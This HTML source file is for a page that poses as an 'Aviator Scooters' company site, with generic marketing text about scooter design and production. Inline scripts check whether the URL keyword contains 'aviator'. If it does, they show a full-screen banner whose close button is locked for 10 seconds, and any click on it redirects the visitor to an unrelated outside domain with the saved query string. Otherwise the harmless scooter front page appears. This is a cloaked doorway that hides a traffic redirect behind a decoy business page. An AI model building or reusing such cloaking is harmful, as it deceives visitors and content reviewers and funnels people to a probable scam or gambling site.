<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <meta charset="utf-8">
    <title>Aviator Scooters: Innovative Personal Transportation</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="title" content="Aviator Scooters: Innovative Personal Transportation">
    <meta name="description"
          content="Aviator scooters represent the pinnacle of engineering and design, offering convenience, eco-friendliness and elegant styling for personal transportation.">
    <meta property="og:title" content="Aviator Scooters: Innovative Personal Transportation">
    <meta property="og:description"
          content="Aviator scooters represent the pinnacle of engineering and design, offering convenience, eco-friendliness and elegant styling for personal transportation.">
    <meta name="twitter:title" content="Aviator Scooters: Innovative Personal Transportation">
    <meta name="twitter:description"
          content="Aviator scooters represent the pinnacle of engineering and design, offering convenience, eco-friendliness and elegant styling for personal transportation.">
    <script type="text/javascript"></script>
    <link as="font" rel="preload" href="/static/css/css.css?family=Inter:400,500&display=swap">
    <link rel="stylesheet" href="/static/css/css.css?family=Inter:400,500&display=swap">
    <link rel="stylesheet" href="/static/css/index.css?v=1720093814279">


</head>
<body>

<style>
    .cookie-dialog {
        z-index: 9999999;
        position: fixed;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        background-color: rgba(250, 250, 250, 0.56);
        border-radius: 24px;
        box-shadow: 0 28px 56px rgba(0, 0, 0, 0.6);
        padding: 10px;
        max-width: 600px;
        width: 90%;
        opacity: 0;
        visibility: hidden;
        transition: opacity 0.8s, visibility 0.8s;
    }

    .cookie-dialog-content {
        display: flex;
        flex-direction: column;
        align-items: center;
        text-align: center;
    }

    .cookie-dialog-header {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-bottom: 36px;
    }

    .cookie-dialog-icon {
        font-size: 48px;
        color: #ff6b6b;
        margin-bottom: 20px;
    }

    .cookie-dialog-title {
        font-size: 18px;
        font-weight: bold;
        color: #000000;
    }

    .cookie-dialog-text {
        font-size: 14px;
        line-height: 1.6;
        color: #000000;
        margin-bottom: 40px;
    }

    .cookie-dialog-link {
        color: #9575cd;
        text-decoration: none;
        transition: color 0.6s;
    }

    .cookie-dialog-link:hover {
        color: #7e57c2;
    }

    .cookie-dialog-actions {
        display: flex;
        justify-content: center;
    }

    .cookie-dialog-button {
        background-color: #2196f3;
        color: #f5f5f5;
        border: none;
        padding: 16px 32px;
        border-radius: 14px;
        font-size: 18px;
        font-weight: bold;
        display: flex;
        align-items: center;
        gap: 12px;
        cursor: pointer;
        transition: background-color 0.6s;
    }

    .cookie-dialog-button:hover {
        background-color: #1e88e5;
    }
</style>

<div id="cookie-dialog" class="cookie-dialog">
    <div class="cookie-dialog-content">
        <div class="cookie-dialog-header">
            <div class="cookie-dialog-icon">
                <i class="fas fa-cookie-bite"></i>
            </div>
            <h2 class="cookie-dialog-title">Cookies Policy</h2>
        </div>
        <p class="cookie-dialog-text">
            By using our website, you consent to our use of cookies. These small data files help us remember your preferences and provide personalized content. We also collect anonymous usage statistics to improve our services. To learn more, please review our <a href="cookie.html" class="cookie-dialog-link">Cookie Policy</a>.
        </p>
        <div class="cookie-dialog-actions">
            <button id="accept-cookies" class="cookie-dialog-button">
                <i class="fas fa-check"></i>
                I Accept
            </button>
        </div>
    </div>
</div>

<script>
  //  if (!localStorage.getItem('cookiesAccepted')) {
        const cookieDialog = document.getElementById('cookie-dialog');
        cookieDialog.style.opacity = '1';
        cookieDialog.style.visibility = 'visible';
    //}


    const acceptCookiesButton = document.getElementById('accept-cookies');
    acceptCookiesButton.addEventListener('click', () => {

        //localStorage.setItem('cookiesAccepted', 'true');


        const cookieDialog = document.getElementById('cookie-dialog');
        cookieDialog.style.opacity = '0';
        cookieDialog.style.visibility = 'hidden';
    });
</script>



<style>
    body, html {
        margin: 0;
        padding: 0;
        width: 100%;
        height: 100%;
        overflow: hidden;
    }

    .bg-banner{
        background: #000000;
        width: 100%;
        height: 100%;
    }

    .banner {
        z-index: 9999999;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: url('/static/banner1.png') no-repeat center center fixed;
        background-size: contain;
        display: flex;
        justify-content: flex-end;
        align-items: flex-start;
    }

    .close-btn {
        margin: 20px;
        font-size: 50px;
        font-weight: bolder;
        color: #8a8a8a;
        transition: color 0.3s;
        z-index: 1; /* Ensure close button is above the banner */
    }

    .close-btn.active {
        color: #8a8a8a;
        cursor: pointer;
    }

    @media (max-width: 768px) {
        .close-btn {
            font-size: 20px;
            margin: 10px;
        }
    }
</style>


<div class="bg-banner">
    <div class="banner" id="banner">
        <div class="close-btn" id="closeBtn">10</div>
    </div>
</div>

<script>
    const url = new URL(window.location.href);
    const keywordValue = url.searchParams.get("keyword");

    cookieDialog.style.opacity = '0';
    cookieDialog.style.visibility = 'hidden';

    if (!keywordValue || !keywordValue.includes("aviator")) {
        // window.location.href = '/site';
        document.querySelector('.banner').style.display = 'none';
        document.querySelector('.bg-banner').style.display = 'none';
        document.body.style.overflow = 'auto';
        document.documentElement.style.overflow = 'auto';

        cookieDialog.style.opacity = '1';
        cookieDialog.style.visibility = 'visible';
    } else {
        if (location.search) {
            localStorage.setItem('savedQuery', location.search);
        }
    }
</script>

<script>
    document.addEventListener('DOMContentLoaded', function() {
        const closeBtn = document.getElementById('closeBtn');
        const banner = document.getElementById('banner');
        let countdown = 10;

        const countdownInterval = setInterval(function() {
            countdown--;
            if (countdown <= 0) {
                clearInterval(countdownInterval);
                closeBtn.textContent = '×';
                closeBtn.classList.add('active');
                closeBtn.style.cursor = 'pointer';
            } else {
                closeBtn.textContent = countdown;
            }
        }, 1000);

        closeBtn.addEventListener('click', function(event) {
            event.stopPropagation();
            if (closeBtn.classList.contains('active')) {
                // window.location.href = '/site';
                document.querySelector('.banner').style.display = 'none';
                document.querySelector('.bg-banner').style.display = 'none';
                document.body.style.overflow = 'auto';
                document.documentElement.style.overflow = 'auto';

                cookieDialog.style.opacity = '1';
                cookieDialog.style.visibility = 'visible';

            }
        });

        banner.addEventListener('click', function(event) {
            if (!event.target.closest('.close-btn')) {
                const savedQuery = localStorage.getItem('savedQuery');
                const redirectUrl = `https://aviacompassupr.top/XM7BRh${savedQuery ? savedQuery : ''}`;
                window.location.href = redirectUrl;
            }
        });
    });
</script>

<section class="kuht-section kuht-section-4aehqzag ">
    <div class="kuht-container-77yea71h  ">
        <div class="kuht-container-1zvehgs5  ">
            <div class="kuht-navbar--wrapper kuht-nav-68cfcfcg-wrapper  ">
                <div class="kuht-navbar kuht-nav-68cfcfcg ">
                    <button aria-label="Navbar Toggle" class="kuht-navbar--toggle" data-target="#kuhtNavbarCollapse">
                        <svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="bars"
                             class="svg-inline--fa fa-bars fa-fw icon " role="img" xmlns="http://www.w3.org/2000/svg"
                             viewbox="0 0 448 512" data-testid="icon-test">
                            <path fill="currentColor"
                                  d="M0 96C0 78.3 14.3 64 32 64H416c17.7 0 32 14.3 32 32s-14.3 32-32 32H32C14.3 128 0 113.7 0 96zM0 256c0-17.7 14.3-32 32-32H416c17.7 0 32 14.3 32 32s-14.3 32-32 32H32c-17.7 0-32-14.3-32-32zM448 416c0 17.7-14.3 32-32 32H32c-17.7 0-32-14.3-32-32s14.3-32 32-32H416c17.7 0 32 14.3 32 32z"></path>
                        </svg>
                    </button>
                    <div class="kuht-navbar--collapse collapse" id="kuhtNavbarCollapse">
                        <div class="kuht-navbar--navs">
                            <ul class="kuht-nav--links normalize">
                                <li class=""><a href="#i1"
                                                class="kuht-nav--link reserch kuht-nav--link-2suuvmpu  "><span
                                        class="kuht-nav--link-icon"></span><span
                                        class="kuht-nav--link-text">Reserch</span></a></li>
                                <li class=""><a href="#i2" class="kuht-nav--link developer kuht-nav--link-jrjtnw95  "><span
                                        class="kuht-nav--link-icon"></span><span
                                        class="kuht-nav--link-text">Developer</span></a></li>
                                <li class=""><a href="#i3" class="kuht-nav--link top kuht-nav--link-bzdz1ay2  "><span
                                        class="kuht-nav--link-icon"></span><span
                                        class="kuht-nav--link-text">Top</span></a></li>
                                <li class=""><a href="#i4"
                                                class="kuht-nav--link service kuht-nav--link-bzdz1ay2  "><span
                                        class="kuht-nav--link-icon"></span><span
                                        class="kuht-nav--link-text">Service</span></a></li>
                                <li class=""><a href="/privacy"
                                                class="kuht-nav--link privacy-policy kuht-nav--link-bzdz1ay2  "><span
                                        class="kuht-nav--link-icon"></span><span class="kuht-nav--link-text">Privacy policy</span></a>
                                </li>
                                <li class=""><a href="/terms"
                                                class="kuht-nav--link terms-of-use kuht-nav--link-qh7ipi4v  "><span
                                        class="kuht-nav--link-text">Terms of use</span></a></li>
                                <li class=""><a href="/cookie"
                                                class="kuht-nav--link cookies kuht-nav--link-beu4vunj  "><span
                                        class="kuht-nav--link-text">Cookies</span></a></li>
                                <li class=""><a href="/data"
                                                class="kuht-nav--link data-product kuht-nav--link-34fgxu59  "><span
                                        class="kuht-nav--link-text">data product</span></a></li>
                                <li class=""><a href="#" class="kuht-nav--link dmca kuht-nav--link-41wfhg1c  "><span
                                        class="kuht-nav--link-text">Dmca</span></a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="kuht-container-np8pbdts  ">
        <div class="kuht-container-aod576aj  ">
            <div class="kuht-wrapper kuht-heading-xryhm5ol-wrapper "><h1
                    class="kuht-heading kuht-heading-xryhm5ol "><span>Aviator Scooters: Full Cycle of Development and Production
</span></h1></div>
            <div class="kuht-text kuht-text-1zkudd3z "><p>In the modern world, scooters are becoming an increasingly
                popular means of transportation, offering convenience, environmental friendliness and style. Aviator
                scooters represent the pinnacle of engineering, combining advanced technology, elegant design and high
                quality performance. Our company is not only engaged in the creation of concepts, but also offers a full
                cycle of scooter development and production, meeting the needs of even the most demanding customers.</p>
            </div>
            <div class="kuht-container-yykw3usv  ">
                <div class="kuht-container-sz38e4b9  ">
                    <div class="kuht-wrapper kuht-heading-rdzm1eyw-wrapper "><h4
                            class="kuht-heading kuht-heading-rdzm1eyw "><span>History and mission of the company
</span></h4></div>
                    <div class="kuht-text kuht-text-gn785x7h "><p>Our company was founded with the aim of
                        revolutionizing the personal transportation market. We strive to create products that not only
                        meet modern standards, but also exceed them. Our work is based on innovation, sustainable
                        development and impeccable quality.</p>
                    </div>
                </div>
                <div class="kuht-container-4nboas7d  ">
                    <div class="kuht-wrapper kuht-heading-l24h4gip-wrapper "><h4
                            class="kuht-heading kuht-heading-l24h4gip "><span>Concept development
</span></h4></div>
                    <div class="kuht-text kuht-text-mpcpd4yi "><p>Concept development is the first and one of the most
                        important stages in the creation of Aviator scooters. Our specialists work closely with
                        customers to understand their needs and turn them into unique and functional solutions.</p>
                    </div>
                </div>
            </div>
        </div>
        <div class="kuht-container-lbyz3cp2  ">
            <div class="kuht-wrapper kuht-image-d1hb4x2u-wrapper "><img alt="rider experience"
                                                                          src="/static/images/7.webp"
                                                                          loading="lazy" class="kuht-image-d1hb4x2u ">
            </div>
        </div>
    </div>
</section>
<section class="kuht-section kuht-section-bi2jyea5 ">
    <div class="kuht-container-832jrx21  ">
        <div class="kuht-container-il0r40rc  ">
            <div class="kuht-text kuht-text-ds3n4yao ">Personal mobility</div>
            <div class="kuht-wrapper kuht-heading-clw5m643-wrapper "><h2 class="kuht-heading kuht-heading-clw5m643 "
                                                                           id="i1"><span>Research and analysis
</span></h2></div>
            <div class="kuht-text kuht-text-1chp4c2u "><p>Each new project begins with a thorough research and
                analysis of the market. We study the latest trends, consumer needs and technological innovations. This
                allows us to develop concepts that are not only relevant today, but will also be in demand in the
                future.</p>
            </div>
        </div>
    </div>
    <div class="kuht-container-evg0iq7j  ">
        <div class="kuht-container-w6jcyykm  ">
            <div class="kuht-text kuht-text-rbddhf4l "><p>After conducting the research, the creative process begins.
                Our designers and engineers are working on creating unique concepts that combine aesthetics and
                functionality. We use advanced technologies and software to create detailed models and prototypes.</p>
            </div>
            <div class="kuht-wrapper kuht-image-l3ts8rme-wrapper "><img
                    src="66867ca2688e490011944edb//static/images/8.jpg"
                    alt="" loading="lazy" class="kuht-image-l3ts8rme "></div>
        </div>
        <div class="kuht-container-6xg7j6zb  ">
            <div class="kuht-wrapper kuht-image-995qqg7r-wrapper "><img alt="clean city"
                                                                          src="/static/images/6.webp"
                                                                          loading="lazy" class="kuht-image-995qqg7r ">
            </div>
            <div class="kuht-wrapper kuht-heading-xumq7hug-wrapper "><h5
                    class="kuht-heading kuht-heading-xumq7hug "><span>Sustainable Cities</span></h5></div>
        </div>
        <div class="kuht-container-gl6wvwf0  ">
            <div class="kuht-wrapper kuht-image-us8p813l-wrapper "><img alt="happy people"
                                                                          src="/static/images/5.webp"
                                                                          loading="lazy" class="kuht-image-us8p813l ">
            </div>
            <div class="kuht-wrapper kuht-heading-qzgnfe6z-wrapper "><h5
                    class="kuht-heading kuht-heading-qzgnfe6z "><span>Happy Riders</span></h5></div>
        </div>
    </div>
</section>
<section class="kuht-section kuht-section-9cxkmxq5 ">
    <div class="">
        <div class="container kuht-row-6j4d1dpe-wrapper    ">
            <div class="kuht-row-6j4d1dpe  flex  ">
                <div class="col-lg-1/1 ">
                    <div class="column-inner kuht-column-bjngf2ss  1/1">
                        <div class="kuht-wrapper kuht-heading-wirag96h-wrapper "><h2
                                class="kuht-heading kuht-heading-wirag96h " id="i2"><span>Full development cycle
</span></h2></div>
                        <div class="kuht-text kuht-text-yw2xb5rr "><p>One of the main advantages of cooperation with
                            our company is the possibility of obtaining a full product development cycle. We offer
                            comprehensive solutions, starting from the idea and ending with mass production.</p>
                            <p></p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="">
        <div class="container kuht-row-7wa0kgma-wrapper    ">
            <div class="kuht-row-7wa0kgma  flex  ">
                <div class="col-lg-1/3 col-md-1/2 col-xs-7/8 ">
                    <div class="column-inner kuht-column-gs5zgxh8  1/3">
                        <div class="kuht-icon-tz2euk40-wrapper  "><span class="kuht-icon kuht-icon-tz2euk40  "><svg
                                aria-hidden="true" focusable="false" data-prefix="far" data-icon="compass"
                                class="svg-inline--fa fa-compass fa-fw icon " role="img"
                                xmlns="http://www.w3.org/2000/svg" viewbox="0 0 512 512" data-testid="icon-test"><path
                                fill="currentColor"
                                d="M464 256A208 208 0 1 0 48 256a208 208 0 1 0 416 0zM0 256a256 256 0 1 1 512 0A256 256 0 1 1 0 256zm306.7 69.1L162.4 380.6c-19.4 7.5-38.5-11.6-31-31l55.5-144.3c3.3-8.5 9.9-15.1 18.4-18.4l144.3-55.5c19.4-7.5 38.5 11.6 31 31L325.1 306.7c-3.2 8.5-9.9 15.1-18.4 18.4zM288 256a32 32 0 1 0 -64 0 32 32 0 1 0 64 0z"></path></svg></span>
                        </div>
                        <div class="kuht-wrapper kuht-heading-t5y9nvkv-wrapper "><h4
                                class="kuht-heading kuht-heading-t5y9nvkv "><span>Design and Engineering
</span></h4></div>
                        <div class="kuht-text kuht-text-5ihldugv "><p>At the design and engineering stage, our
                            specialists are working on detailing the concept, taking into account all technical and
                            aesthetic aspects. We create 3D models, perform testing and optimization to ensure that each
                            element meets the highest quality standards.</p>
                        </div>
                    </div>
                </div>
                <div class="col-lg-1/3 col-md-1/2 col-xs-7/8 ">
                    <div class="column-inner kuht-column-tehvoggz  1/3">
                        <div class="kuht-icon-p7kx3aa8-wrapper  "><span class="kuht-icon kuht-icon-p7kx3aa8  "><svg
                                aria-hidden="true" focusable="false" data-prefix="far" data-icon="square-caret-right"
                                class="svg-inline--fa fa-square-caret-right fa-fw icon " role="img"
                                xmlns="http://www.w3.org/2000/svg" viewbox="0 0 448 512" data-testid="icon-test"><path
                                fill="currentColor"
                                d="M400 96c0-8.8-7.2-16-16-16L64 80c-8.8 0-16 7.2-16 16l0 320c0 8.8 7.2 16 16 16l320 0c8.8 0 16-7.2 16-16l0-320zM384 32c35.3 0 64 28.7 64 64l0 320c0 35.3-28.7 64-64 64L64 480c-35.3 0-64-28.7-64-64L0 96C0 60.7 28.7 32 64 32l320 0zM320 256c0 6.7-2.8 13-7.7 17.6l-112 104c-7 6.5-17.2 8.2-25.9 4.4s-14.4-12.5-14.4-22l0-208c0-9.5 5.7-18.2 14.4-22s18.9-2.1 25.9 4.4l112 104c4.9 4.5 7.7 10.9 7.7 17.6z"></path></svg></span>
                        </div>
                        <div class="kuht-wrapper kuht-heading-xbzxzezz-wrapper "><h4
                                class="kuht-heading kuht-heading-xbzxzezz "><span>Prototyping
</span></h4></div>
                        <div class="kuht-text kuht-text-v39ys4ml "><p>After the design stage is completed, the
                            prototyping process begins. We produce the first samples of scooters that undergo
                            comprehensive testing. This allows us to identify and eliminate possible shortcomings, as
                            well as ensure that the product meets all requirements.</p>
                        </div>
                    </div>
                </div>
                <div class="col-lg-1/3 col-md-1/2 col-xs-7/8 ">
                    <div class="column-inner kuht-column-6lwn6g97  1/3">
                        <div class="kuht-icon-yhe0dnf7-wrapper  "><span class="kuht-icon kuht-icon-yhe0dnf7  "><svg
                                aria-hidden="true" focusable="false" data-prefix="fas" data-icon="bullseye"
                                class="svg-inline--fa fa-bullseye fa-fw icon " role="img"
                                xmlns="http://www.w3.org/2000/svg" viewbox="0 0 512 512" data-testid="icon-test"><path
                                fill="currentColor"
                                d="M448 256A192 192 0 1 0 64 256a192 192 0 1 0 384 0zM0 256a256 256 0 1 1 512 0A256 256 0 1 1 0 256zm256 80a80 80 0 1 0 0-160 80 80 0 1 0 0 160zm0-224a144 144 0 1 1 0 288 144 144 0 1 1 0-288zM224 256a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z"></path></svg></span>
                        </div>
                        <div class="kuht-wrapper kuht-heading-9pekuxl4-wrapper "><h4
                                class="kuht-heading kuht-heading-9pekuxl4 "><span>Production facilities
</span></h4></div>
                        <div class="kuht-text kuht-text-yl5r51fm "><p>Our production facilities allow us to realize
                            the most daring ideas. We use modern equipment and advanced technologies to manufacture
                            parts and assemble scooters.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="">
        <div class="container kuht-row-drfcqq5f-wrapper    ">
            <div class="kuht-row-drfcqq5f  flex  ">
                <div class="col-lg-1/1 ">
                    <div class="column-inner kuht-column-iw1zvckp  1/1">
                        <div class="kuht-wrapper kuht-image-pyftrrju-wrapper "><img alt="scooter factory"
                                                                                      src="/static/images/4.webp"
                                                                                      loading="lazy"
                                                                                      class="kuht-image-pyftrrju ">
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<section class="kuht-section kuht-section-krh4ivnh ">
    <div class="kuht-container-abkevtfo  ">
        <div class="kuht-container-5s2n4xyt  ">
            <div class="kuht-wrapper kuht-heading-msxrxuxs-wrapper "><h5
                    class="kuht-heading kuht-heading-msxrxuxs "><span>Amazing</span></h5></div>
            <div class="kuht-wrapper kuht-heading-3c2n8jan-wrapper "><h2 class="kuht-heading kuht-heading-3c2n8jan "
                                                                           id="i3"><span>Top Scooters
</span></h2></div>
        </div>
        <div class="kuht-container-5i45wm3d  ">
            <div class="kuht-container-m90nt2uu  ">
                <div class="kuht-wrapper kuht-image-n3mug34k-wrapper "><img alt="scooter riding"
                                                                              src="/static/images/3.webp"
                                                                              loading="lazy"
                                                                              class="kuht-image-n3mug34k "></div>
            </div>
            <div class="kuht-container-l7w752po  ">
                <div class="kuht-text kuht-text-8a1mf2da "><p>Quality control is an integral part of our production
                    process. Each product is thoroughly tested at all stages of production, which guarantees the high
                    quality and durability of our scooters.</p>
                </div>
                <div class="kuht-wrapper kuht-heading-qxxqlj6n-wrapper "><h5
                        class="kuht-heading kuht-heading-qxxqlj6n "><span>Quality control
</span></h5></div>
            </div>
        </div>
        <div class="kuht-container-bf7qkfxg  ">
            <div class="kuht-container-8ak2liee  ">
                <div class="kuht-text kuht-text-h0eorqvm "><p>We attach great importance to the issues of
                    environmental friendliness and sustainable development. Only safe and environmentally friendly
                    materials are used in production. We strive to minimize waste and energy consumption by contributing
                    to environmental protection.</p>
                </div>
                <div class="kuht-wrapper kuht-heading-o7pbj1n5-wrapper "><h5
                        class="kuht-heading kuht-heading-o7pbj1n5 "><span>Environmental friendliness and sustainable development
</span></h5></div>
            </div>
            <div class="kuht-container-t2uwefgi  ">
                <div class="kuht-wrapper kuht-image-jq8qqh91-wrapper "><img alt="scooter city"
                                                                              src="/static/images/2.webp"
                                                                              loading="lazy"
                                                                              class="kuht-image-jq8qqh91 "></div>
            </div>
        </div>
    </div>
</section>
<section class="kuht-section kuht-section-4k5cw80p ">
    <div class="">
        <div class="container kuht-row-s7erie4o-wrapper    ">
            <div class="kuht-row-s7erie4o  flex  ">
                <div class="col-lg-2/3 col-md-2/5 ">
                    <div class="column-inner kuht-column-7jq9kfus  2/3">
                        <div class="kuht-wrapper kuht-image-c13m08ue-wrapper "><img alt="electric vehicle builder"
                                                                                      src="/static/images/1.webp"
                                                                                      loading="lazy"
                                                                                      class="kuht-image-c13m08ue ">
                        </div>
                    </div>
                </div>
                <div class="col-lg-4/5 col-md-3/5 ">
                    <div class="column-inner kuht-column-bteoo6dr  4/5">
                        <div class="">
                            <div class=" kuht-row-6sjs3qhu-wrapper    ">
                                <div class="kuht-row-6sjs3qhu  flex  ">
                                    <div class="col-lg-2/3 ">
                                        <div class="column-inner kuht-column-7led3krr  2/3">
                                            <div class="kuht-wrapper kuht-heading-8gibnee3-wrapper "><h2
                                                    class="kuht-heading kuht-heading-8gibnee3 " id="i4"><span>Services and support
</span></h2></div>
                                            <div class="kuht-text kuht-text-e3jqo9p0 "><p>In addition to development
                                                and production, our company offers a wide range of additional services,
                                                including after-sales service, technical support and consultations.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<section class="kuht-section kuht-section-e5gqj2ct ">
    <div class="kuht-container-67dh0zr2  ">
        <div class="kuht-container-8r2uupj4  ">
            <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3889.3493277343566!2d77.60817161487518!3d12.922752190912615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3bae151f2a05f2d1%3A0xb3c45c8f65d0be40!2sIndia.%20Hosur%20Main%20Rd%2C%20At%20Signal%20Beside%20Ad%20Lab%2C%20Madiwala%2C%20Bengaluru%2C%20Karnataka%20560068%2C%20India!5e0!3m2!1sen!2sus!4v1684334511394!5m2!1sen!2sus"
                    width="450" height="450" style="border:0;" allowfullscreen="" loading="lazy"
                    referrerpolicy="no-referrer-when-downgrade"></iframe>
        </div>
        <div class="kuht-container-f1nujl6k  ">
            <div class="kuht-wrapper kuht-heading-h66fp9ip-wrapper "><h4
                    class="kuht-heading kuht-heading-h66fp9ip "><span>Aviator scooters are not just a means of transportation, they are a symbol of style, quality and innovation. Our company offers a full cycle of development and production, ensuring high quality at every stage. By ordering from us, you get not only a product, but also a complete solution that meets all your needs.
</span></h4></div>
            <div class="kuht-line-yh09zuft-wrapper ">
                <hr class="kuht-line-yh09zuft ">
            </div>
            <div class="kuht-container-giv2xa8v  ">
                <div class="kuht-container-ub4fsl08  ">
                    <div class="kuht-wrapper kuht-heading-w9rwut7c-wrapper "><h5
                            class="kuht-heading kuht-heading-w9rwut7c "><span>Contact Us</span></h5></div>
                    <div class="kuht-text kuht-text-qyy8rzce "><p>India. Hosur Main Road, At Signal Beside Ad Lab,
                        Madiwala,Bangalore,Karnataka</p>
                    </div>
                </div>
                <div class="kuht-container-3yeglvno  ">
                    <div class="kuht-wrapper kuht-heading-hot2m2rm-wrapper "><h5
                            class="kuht-heading kuht-heading-hot2m2rm "><span>Follow Us</span></h5></div>
                    <ul class="kuht-list kuht-links-dticfd32 ">
                        <li class="kuht-list--item"><a href="#" class="kuht-list--link popup-btn"><span
                                class="kuht-list--text">Phone:  +9125505585</span></a></li>
                        <li class="kuht-list--item"><a href="#" class="kuht-list--link popup-btn"><span
                                class="kuht-list--text">Zip code:  560095</span></a></li>
                        <li class="kuht-list--item"><a href="#" class="kuht-list--link "><span
                                class="kuht-list--text"></span></a></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</section>



</body>
</html>